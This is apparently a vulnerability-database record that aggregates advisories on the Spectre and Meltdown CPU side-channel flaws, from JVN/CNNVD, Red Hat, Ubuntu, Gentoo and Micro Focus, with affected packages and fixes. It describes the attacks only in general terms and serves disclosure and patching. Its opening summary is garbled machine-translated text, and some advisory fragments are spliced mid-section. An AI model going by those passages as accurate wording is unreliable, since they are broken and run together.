        "db": "JVNDB",
        "id": "JVNDB-2010-001721"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-150"
      }
    ],
    "trust": 0.6
  }
}

var-201801-1711
Vulnerability from variot

Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. Has speculative execution function and out-of-order execution function CPU Several researchers have reported methods of performing side-channel attacks against Has speculative execution function and out-of-order execution function CPU side-channel attack method against (Spectre and Meltdown) has been reported. For more information, Google Project Zero blog post in ("Reading privileged memory with a side-channel") or Graz University of Technology (TU Graz) information from researchers in ("Meltdown and Spectre") Please refer to. "Reading privileged memory with a side-channel"https://googleprojectzero.blogspot.jp/2018/01/reading-privileged-memory-with-side.html"Meltdown and Spectre"https://meltdownattack.com/Sensitive information can be obtained from processes running with user privileges. Spectre As for the attack, crafted Javascript by the code Javascript cannot be obtained from web It has been reported that data can be obtained during the browser process. SpectreMeltdownCPU mechanism for triggeringSpeculative execution from branch predictionOut-of-order executionAffected platformsCPUs that perform speculative execution from branch predictionCPUs that allow memory reads in out-of-order instructionsDifficulty of successful attackHigh - Requires tailoring to the software environment of the victim processLow - Kernel memory access exploit code is mostly universalImpactCross- and intra-process (including kernel) memory disclosureKernel memory disclosure to userspaceSoftware mitigationsVariant 1: Compiler changes. Web browser updates to help prevent exploitation from JavaScriptVariant 2: Indirect Branch Restricted Speculation (IBRS). Note: The software mitigation for Spectre variant 2 requires CPU microcode updatesKernel page-table isolation (KPTI)CVE-2017-5715 Affected CVE-2017-5753 Affected CVE-2017-5754 Affected. Two vulnerabilities are identified, known as "Variant 3a" and "Variant 4". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Spectre vulnerability exists in the CPU processor core. Because Intel does not separate low-privileged applications from accessing kernel memory, an attacker can use a malicious application to obtain private data that should be quarantined. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Qualcomm Closed-Source Components are prone to multiple unspecified vulnerabilities. An attacker can exploit these issues to perform unauthorized actions. This may aid in further attacks. These issues are being tracked by Android Bug IDs A-78135902, A-66913713, A-67712316, A-79419833, A-109678200, A-78283451, A-78285196, A-78284194, A-78284753, A-78284517, A-78240177, A-78239686, A-78284545, A-109660689, A-78240324, A-68141338, A-78286046, A-73539037, A-73539235, A-71501115, A-33757308, A-74236942, A-77485184, A-77484529, A-33385206, A-79419639, A-79420511, A-109678338, and A-112279564. Intel and ARM CPU chips have an information disclosure vulnerability, which originates from a flaw in the processor data boundary mechanism. The following products and versions are affected: ARM Cortex-A75; Intel Xeon E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4; Xeon E3-1245 v2, v3, v5, v6; Xeon X7542 wait.

Security Fix(es):

  • hw: cpu: speculative execution permission faults handling (CVE-2017-5754)

  • Kernel: error in exception handling leads to DoS (CVE-2018-8897)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • If an NFSv3 client mounted a subdirectory of an exported file system, a directory entry to the mount hosting the export was incorrectly held even after clearing the cache. Consequently, attempts to unmount the subdirectory with the umount command failed with the EBUSY error. With this update, the underlying source code has been fixed, and the unmount operation now succeeds as expected in the described situation. (BZ#1538588)

  • The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554254)

  • X-Scanned-By: MIMEDefang 2.79 on 10.5.11.16 X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.5.16 (mx1.redhat.com [10.5.110.25]); Thu, 04 Jan 2018 01:01:01 +0000 (UTC)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security update Advisory ID: RHSA-2018:0008-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:0008 Issue date: 2018-01-03 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited.

Note: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software mitigation for this hardware issue at a cost of potential performance penalty. Please refer to References section for further information about this issue and the performance impact.

In this update mitigations for x86-64 architecture are provided.

Variant CVE-2017-5753 triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5753, Important)

Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important)

Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instruction permission faults, exception generation triggered by a faulting access is suppressed until the retirement of the whole instruction block. In a combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. (CVE-2017-5754, Important)

Note: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64 microprocessors are not affected by this issue.

Red Hat would like to thank Google Project Zero for reporting these issues.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass 1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection 1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

ppc64: kernel-2.6.32-696.18.7.el6.ppc64.rpm kernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm kernel-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-headers-2.6.32-696.18.7.el6.ppc64.rpm perf-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm

s390x: kernel-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-headers-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm perf-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/speculativeexecution https://access.redhat.com/security/cve/CVE-2017-5753 https://access.redhat.com/security/cve/CVE-2017-5715 https://access.redhat.com/security/cve/CVE-2017-5754

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O OR+iGnoY+cALbsBWKwbmzQM= =V4ow -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-3523-1 January 09, 2018

linux vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 17.10

Summary:

Several security issues were fixed in the Linux kernel. This flaw is known as Meltdown. (CVE-2017-5754)

Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel did not properly check the relationship between pointer values and the BPF stack. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-17863)

Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel improperly performed sign extension in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-16995)

Alexei Starovoitov discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel contained a branch-pruning logic issue around unreachable code. A local attacker could use this to cause a denial of service. (CVE-2017-17862)

Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation in the Linux kernel mishandled pointer data values in some situations. (CVE-2017-17864)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 17.10: linux-image-4.13.0-25-generic 4.13.0-25.29 linux-image-4.13.0-25-lowlatency 4.13.0-25.29 linux-image-generic 4.13.0.25.26 linux-image-lowlatency 4.13.0.25.26

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 6.5) - x86_64

  1. 7) - noarch, x86_64

  2. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201810-06


                                       https://security.gentoo.org/

Severity: Normal Title: Xen: Multiple vulnerabilities Date: October 30, 2018 Bugs: #643350, #655188, #655544, #659442 ID: 201810-06


Synopsis

Multiple vulnerabilities have been found in Xen, the worst of which could cause a Denial of Service condition.

Background

Xen is a bare-metal hypervisor.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 app-emulation/xen < 4.10.1-r2 >= 4.10.1-r2 2 app-emulation/xen-tools < 4.10.1-r2 >= 4.10.1-r2 ------------------------------------------------------------------- 2 affected packages

Description

Multiple vulnerabilities have been discovered in Xen. Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All Xen users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.10.1-r2"

All Xen tools users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot -v ">=app-emulation/xen-tools-4.10.1-r2"

References

[ 1 ] CVE-2017-5715 https://nvd.nist.gov/vuln/detail/CVE-2017-5715 [ 2 ] CVE-2017-5753 https://nvd.nist.gov/vuln/detail/CVE-2017-5753 [ 3 ] CVE-2017-5754 https://nvd.nist.gov/vuln/detail/CVE-2017-5754 [ 4 ] CVE-2018-10471 https://nvd.nist.gov/vuln/detail/CVE-2018-10471 [ 5 ] CVE-2018-10472 https://nvd.nist.gov/vuln/detail/CVE-2018-10472 [ 6 ] CVE-2018-10981 https://nvd.nist.gov/vuln/detail/CVE-2018-10981 [ 7 ] CVE-2018-10982 https://nvd.nist.gov/vuln/detail/CVE-2018-10982 [ 8 ] CVE-2018-12891 https://nvd.nist.gov/vuln/detail/CVE-2018-12891 [ 9 ] CVE-2018-12892 https://nvd.nist.gov/vuln/detail/CVE-2018-12892 [ 10 ] CVE-2018-12893 https://nvd.nist.gov/vuln/detail/CVE-2018-12893 [ 11 ] CVE-2018-15468 https://nvd.nist.gov/vuln/detail/CVE-2018-15468 [ 12 ] CVE-2018-15469 https://nvd.nist.gov/vuln/detail/CVE-2018-15469 [ 13 ] CVE-2018-15470 https://nvd.nist.gov/vuln/detail/CVE-2018-15470 [ 14 ] CVE-2018-3620 https://nvd.nist.gov/vuln/detail/CVE-2018-3620 [ 15 ] CVE-2018-3646 https://nvd.nist.gov/vuln/detail/CVE-2018-3646 [ 16 ] CVE-2018-5244 https://nvd.nist.gov/vuln/detail/CVE-2018-5244 [ 17 ] CVE-2018-7540 https://nvd.nist.gov/vuln/detail/CVE-2018-7540 [ 18 ] CVE-2018-7541 https://nvd.nist.gov/vuln/detail/CVE-2018-7541 [ 19 ] CVE-2018-7542 https://nvd.nist.gov/vuln/detail/CVE-2018-7542

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201810-06

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Note: the current version of the following document is available here: https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03158629

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03158629 Version: 2

MFSBGN03802 - Virtualization Performance Viewer (vPV) / Cloud Optimizer, Local Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2018-05-11 Last Updated: 2018-05-10

Potential Security Impact: Local: Disclosure of Information

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY A potential vulnerability has been identified in 3rd party component used by Micro Focus Virtualization Performance Viewer (vPV) / Cloud Optimizer Virtual Appliance. The vulnerability could be exploited to Local Disclosure of Information.

References:

  • CVE-2017-5753
  • CVE-2017-5715
  • CVE-2017-5754

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  • HP Virtualization Performance Viewer Software - v2.20, v3.0, v3.01, v3.02, v3.03
  • HPE Cloud Optimizer - v2.20, v3.0, v3.01, v3.02, v3.03

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

RESOLUTION

Micro Focus is actively working with its vendors to address any systems-level Spectre and Meltdown impacts.However, if you have immediate concerns or questions regarding CentOS and its approach to Spectre or Meltdown, please contact them directly.

HISTORY

Version:1 (rev.1) - 12 April 2018 Initial release

Version:2 (rev.2) - 10 May 2018 Vulnerability Summary

Third Party Security Patches: Third party security patches that are to be installed on systems running Micro Focus products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal Micro Focus services support channel. For other issues about the content of this Security Bulletin, send e-mail to cyber-psrt@microfocus.com.

Report: To report a potential security vulnerability for any supported product: Web form: https://www.microfocus.com/support-and-services/report-security Email: security@microfocus.com

Subscribe: To initiate receiving subscriptions for future Micro Focus Security Bulletin alerts via Email, please subscribe here - https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification Once you are logged in to the portal, please choose security bulletins under product and document types. Please note that you will need to sign in using a Passport account. If you do not have a Passport account yet, you can create one- its free and easy https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://softwaresupport.hpe.com/security-vulnerability

Software Product Category: The Software Product Category is represented in the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software GN = Micro Focus General Software MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to maintain system integrity. Micro Focus is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected Micro Focus products the important security information contained in this Bulletin. Micro Focus recommends that all users determine the applicability of this information to their individual situations and take appropriate action. Micro Focus does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, Micro Focus will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, Micro Focus disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

Copyright 2017 EntIT Software LLC

